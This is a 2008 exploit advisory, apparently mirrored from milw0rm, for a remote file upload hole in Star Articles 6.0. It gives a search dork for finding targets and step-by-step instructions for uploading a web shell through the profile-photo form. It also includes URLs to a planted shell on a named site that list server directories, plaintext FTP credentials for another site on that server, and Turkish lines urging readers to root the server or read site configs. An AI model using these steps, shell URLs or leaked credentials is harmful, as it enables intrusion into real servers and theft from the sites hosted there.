exploit-db-mirror/platforms/php/webapps/7251.txt

[~] Star Articles 6.0 Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] dork: allinurl:"article.download.php"   ( baya bi site var )
[~]
[~] N0T: pls dont make demos ( demolarI hacklemeyin LUTFEN kucuk bir rica )
[~] -----------------------------------------------------------

expl:

http://script//authorphoto/user_name[id].php

example:

http://www.lcfarticles.com//authorphoto/zorlu40.php ( according to me you dont make hack this site )

http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server fena deil )

hemen hacklemeyin arkadaslar serverý kurcalayIn bakIn misal:

http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F

bir cok site var. ya rootlayýn yada tek tek cakýn config okuyun vs. serverdaki sitelerle ugrasmadan zone kasIlmaz ;) 

http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F

bu serverdaki bir site icin:

ftp://ftp.ababy.com.au/  ( ftp pass ve username )

user: kiddybab

pass: KidEw1nk08

ne biliyim iste biseler yapmaya calIsIn amacIm yardImcý olmak yoksa isterseniz hemen hackleyin isterseniz kurcalayIn siz bilirsiniz ;)


first register for site

after login to site and edit profile ( direck lnk: http://www.lcfarticles.com/user.modify.profile.php )

click to gozat button and select your shell after upload you shell

more after go repat edit profile page and you look you photo. right click to you photo

select to properties copy photo link and paste you explorer.

go your shell

examp:

user: trt-turk@hotmail.com

passwd: zorlu1

login: 

http://www.lcfarticles.com/user.login.php

shell:

http://www.lcfarticles.com//authorphoto/zorlu40.php


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & RedHaK
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-27]